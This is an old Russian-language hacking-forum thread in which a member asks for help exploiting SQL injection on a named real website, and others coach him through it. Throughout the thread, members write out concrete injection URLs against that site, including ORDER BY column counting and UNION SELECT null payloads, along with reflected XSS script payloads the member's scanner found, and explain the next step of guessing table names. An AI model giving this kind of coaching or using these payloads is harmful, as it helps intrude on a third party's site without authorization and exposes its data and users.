Помогите с SQL injection, pls

Discussion in 'PHP' started by advsystem, 14 Oct 2006.

  1. advsystem

    advsystem New Member

    Joined:
    4 Oct 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Вообщем нашел один сайтец, там можно провести SQL инъекцию, но у меня не совсем как-то удачно получается :( Может кто-нибудь поможет? Заранее thanks :)

    http://atmsurf.com:80/news.php?ocd=view&id=1'+and+'1'='0
    http://atmsurf.com:80/news.php?ocd=view&id='

    пробовал много вариантов, но никак не получается.

    Кстати сканер выдал еще это:

    http://atmsurf.com:80/forgot_pass.php/>'><ScRiPt>alert(125764739)%3B</ScRiPt>
    http://atmsurf.com:80/signup.php/>'><ScRiPt>alert(121850224)%3B</ScRiPt>
     
  2. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    мож там фильтруется все -- вот и не вышло ???
     
  3. advsystem

    advsystem New Member

    Joined:
    4 Oct 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Може быть, поэтому я решил спросить вас. Можно, что либо сделал там или безнадежно :)
     
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Acunetix Web Vul рулит ? =)
    кол-во столбцов подобрал хоть? влом просто )
    или не можешь имена подобрать ?
     
  5. advsystem

    advsystem New Member

    Joined:
    4 Oct 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ага, хороший сканер=)
    Там, кол-во столбцов пробовал подгонять, но постоянно пишут ошибку, хотя там их не много это я знаю.
    А, ошибку постоянно выдает :(
     
  6. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    опиши способ "подгона" )
     
  7. advsystem

    advsystem New Member

    Joined:
    4 Oct 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ну, допустим

    http://atmsurf.com/news.php?ocd=view&id=1'+union+select+null,null/*
    так выдает ошибку.
    http://atmsurf.com/news.php?ocd=view&id=1+union+select+null,null/*
    так нет.
    Пробовал еще несколько вариантов.
     
  8. pop_korn

    pop_korn Elder - Старейшина

    Joined:
    13 Sep 2005
    Messages:
    148
    Likes Received:
    33
    Reputations:
    14
    эм а ковычка тут нафиг не нужна :)
    поэтому
    http://atmsurf.com/news.php?ocd=view&id=1/*
    потом щитаеш кол-во столбцов, с помощью order by
    http://atmsurf.com/news.php?ocd=view&id=1 order by 10/*
    если выдало ошибку, то столбцов меньше, чем 10
    подбираеш пока не узнаеш кол-во столбцов, потом собственно юзаеш union

    зы уже сто раз расписали, как это делать :)
     
  9. advsystem

    advsystem New Member

    Joined:
    4 Oct 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    А если и 100 и 200 вписываешь?
    И ошибку не выдает.
    Полей, то всяко 100 не может быть :)
     
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    _http://atmsurf.com:80/news.php?ocd=view&id=1'+union+select+null,null,null,null,null,null,null,null/*

    и в чем проблема ? =) валяй даьше..
     
  11. SMERSH

    SMERSH Member

    Joined:
    11 Oct 2006
    Messages:
    11
    Likes Received:
    11
    Reputations:
    1
    у тебя не получится выбрать данные из другой таблицы при помощи юнион запроса, если в скрипте выбирается только один кортеж из таблицы, если в выборке будет не одна запись, то можно прикрутить юнион запрос, как тебе показали выше
    кол-во null, будет соответствовать кол-во выбираемых полей из таблицы в прикрученном юнион их должно быть столько же, подбирай кол-во столбцов до того момента как запрос не отработает без ошибок, потом можешь подбирать название таблицы. В общем более подробно я описал это здесь:
    http://www.bit-team.com/modules.php?name=Articles&file=view&articles_id=13
     
    1 person likes this.
  12. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    Отличный Мануал! Спасибо!
    Возьму на заметку!
     
  13. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Он был на ачате